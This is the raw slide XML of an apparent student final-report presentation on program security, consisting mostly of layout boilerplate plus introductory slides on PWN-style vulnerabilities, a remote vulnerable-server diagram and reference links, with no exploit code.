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765" r:id="rId2"/>
    <p:sldId id="766" r:id="rId3"/>
    <p:sldId id="768" r:id="rId4"/>
    <p:sldId id="767" r:id="rId5"/>
    <p:sldId id="771" r:id="rId6"/>
    <p:sldId id="773" r:id="rId7"/>
    <p:sldId id="769" r:id="rId8"/>
    <p:sldId id="770" r:id="rId9"/>
    <p:sldId id="772" r:id="rId10"/>
    <p:sldId id="774" r:id="rId11"/>
    <p:sldId id="288" r:id="rId12"/>
    <p:sldId id="775" r:id="rId13"/>
    <p:sldId id="779" r:id="rId14"/>
    <p:sldId id="778" r:id="rId15"/>
    <p:sldId id="780" r:id="rId16"/>
    <p:sldId id="781" r:id="rId17"/>
    <p:sldId id="782" r:id="rId18"/>
    <p:sldId id="783" r:id="rId19"/>
    <p:sldId id="787" r:id="rId20"/>
    <p:sldId id="785" r:id="rId21"/>
    <p:sldId id="788" r:id="rId22"/>
    <p:sldId id="789" r:id="rId23"/>
    <p:sldId id="790" r:id="rId24"/>
    <p:sldId id="776" r:id="rId25"/>
    <p:sldId id="791" r:id="rId26"/>
    <p:sldId id="792" r:id="rId27"/>
    <p:sldId id="793" r:id="rId28"/>
    <p:sldId id="795" r:id="rId29"/>
    <p:sldId id="796" r:id="rId30"/>
    <p:sldId id="797" r:id="rId31"/>
    <p:sldId id="777" r:id="rId32"/>
    <p:sldId id="799" r:id="rId33"/>
    <p:sldId id="798" r:id="rId34"/>
    <p:sldId id="800" r:id="rId35"/>
    <p:sldId id="801" r:id="rId36"/>
    <p:sldId id="804" r:id="rId37"/>
    <p:sldId id="805" r:id="rId38"/>
    <p:sldId id="806" r:id="rId39"/>
    <p:sldId id="807" r:id="rId40"/>
    <p:sldId id="809" r:id="rId41"/>
    <p:sldId id="272" r:id="rId42"/>
    <p:sldId id="813" r:id="rId43"/>
    <p:sldId id="812" r:id="rId44"/>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瀚森 施" initials="瀚森" lastIdx="4" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="59254aa23faf0f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snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="108" d="100"/>
          <a:sy n="108" d="100"/>
        </p:scale>
        <p:origin x="6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03D66-159F-4C89-945F-C211097EB92E}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/5/17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2C009-2DB9-4FB0-BF28-5811C99D51EB}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50311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矩形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365759" y="2166364"/>
            <a:ext cx="11471565" cy="1739347"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="45720" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="6000" spc="150" baseline="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1524000" y="3996250"/>
            <a:ext cx="9144000" cy="1309255"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">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TW" altLang="en-US" noProof="0"/>
              <a:t>按一下以編輯母片子標題樣式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期版面配置區 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{944E0ABE-591B-4F44-9198-DD1906B11398}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/5/17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="頁尾版面配置區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24279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fld id="{944E0ABE-591B-4F44-9198-DD1906B11398}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/5/17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="頁尾版面配置區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401870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直排標題 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" orient="vert"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9160624" y="274638"/>
            <a:ext cx="2402380" cy="5897562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"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838199" y="274638"/>
            <a:ext cx="7973291" cy="5897562"/>
          </a:xfrm>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a:xfrm>
            <a:off x="838200" y="6422854"/>
            <a:ext cx="2743196" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{944E0ABE-591B-4F44-9198-DD1906B11398}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/5/17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="頁尾版面配置區 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776135" y="6422854"/>
            <a:ext cx="4279669" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="投影片編號預留位置 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8073048" y="6422854"/>
            <a:ext cx="879759" cy="365125"/>
          </a:xfrm>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269395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44E0ABE-591B-4F44-9198-DD1906B11398}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/5/17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129407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fld id="{944E0ABE-591B-4F44-9198-DD1906B11398}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/5/17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="頁尾版面配置區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189345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1"/>
      </p:bgRef>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形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33191" y="2208879"/>
            <a:ext cx="10515600" cy="1676400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="6000" b="0" spc="150" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>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33191" y="4010334"/>
            <a:ext cx="10515600" cy="1174639"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"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按一下以編輯母片文字樣式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期版面配置區 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{944E0ABE-591B-4F44-9198-DD1906B11398}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/5/17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="頁尾版面配置區 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="投影片編號預留位置 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>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20014946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205344" y="2011680"/>
            <a:ext cx="4754880" cy="420624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6230391" y="2011680"/>
            <a:ext cx="4754880" cy="420624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fld id="{944E0ABE-591B-4F44-9198-DD1906B11398}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/5/17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="頁尾版面配置區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320626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207008" y="1913470"/>
            <a:ext cx="4754880" cy="743094"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="2656566"/>
            <a:ext cx="4754880" cy="35661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6231230" y="1913470"/>
            <a:ext cx="4754880" cy="743094"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231230" y="2656564"/>
            <a:ext cx="4754880" cy="35661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p>
            <a:fld id="{944E0ABE-591B-4F44-9198-DD1906B11398}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/5/17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="頁尾版面配置區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422695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fld id="{944E0ABE-591B-4F44-9198-DD1906B11398}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/5/17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="頁尾版面配置區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20531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fld id="{944E0ABE-591B-4F44-9198-DD1906B11398}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/5/17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="頁尾版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="投影片編號預留位置 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>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185607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1207008" y="2120054"/>
            <a:ext cx="6126480" cy="411480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7789023" y="2147486"/>
            <a:ext cx="3200400" cy="3432319"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">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p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{944E0ABE-591B-4F44-9198-DD1906B11398}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/5/17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="頁尾版面配置區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269334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圖片版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1280160" y="2211494"/>
            <a:ext cx="6126480" cy="3931920"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="365760" rtlCol="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7790688" y="2150621"/>
            <a:ext cx="3200400" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">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p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{944E0ABE-591B-4F44-9198-DD1906B11398}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/5/17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="頁尾版面配置區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283221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矩形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預留位置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latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{944E0ABE-591B-4F44-9198-DD1906B11398}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/5/17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="頁尾版面配置區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latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{01F9DD97-FAF8-4FAD-83A8-4B12303359E4}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="788684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微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
          <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>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微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
          <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>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微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
          <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>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微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
          <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>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微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
          <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>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微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
          <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>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ada.re/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zh.wikipedia.org/zh-tw/%E6%BC%8F%E6%B4%9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exploit-db.com/shellcodes/46907"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7B453-EF94-462D-82E8-9FAA4C3309B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式安全期末報告</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副標題 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{259AEDE9-B9FF-4297-A548-0DE42CB95653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>資工四</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0"/>
              <a:t>4086E001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4000" dirty="0"/>
              <a:t> 林宗彥</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文字方塊 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D6A31D-9F17-401A-ABD9-DD9DD19D4F86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="906164"/>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新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>程式安全</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261966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F85BB-17EB-48C9-B15F-8FCA51C861C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>PWN</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文字版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DB18C1-273E-4D60-B2DA-BED1F54971CA}"/>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27086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88CD3-3D2D-4417-A1F4-EEA7D6C44EFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式漏洞的嚴重性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>PWN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E2EE6D0-D08E-4222-B573-D639AC01C79D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924308" y="3994957"/>
            <a:ext cx="1365504" cy="1895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遠端伺服器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>有一支有洞的程式在執行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ADC10C1-0667-4FD1-86D1-478628D97C2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2842531" y="4859636"/>
            <a:ext cx="1534887" cy="1053465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="直線單箭頭接點 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7489CC09-547A-4F4B-A98F-8455C4631303}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4377418" y="5349794"/>
            <a:ext cx="3437163" cy="365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9DD2691-295C-4D7F-8C0D-0B1E175BE6A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4487146" y="5521481"/>
            <a:ext cx="1845377" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>任務類型 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1:DOS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="直線單箭頭接點 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{948A5801-B252-48D3-A37F-9067705DF5F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267690" y="3514566"/>
            <a:ext cx="3546891" cy="9607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1" name="圖片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0997CEE3-1E76-446F-A4CD-BB1B07D81709}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773951" y="3130280"/>
            <a:ext cx="1603467" cy="1067035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A941B060-E70C-4A10-B02D-02547A1F87EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
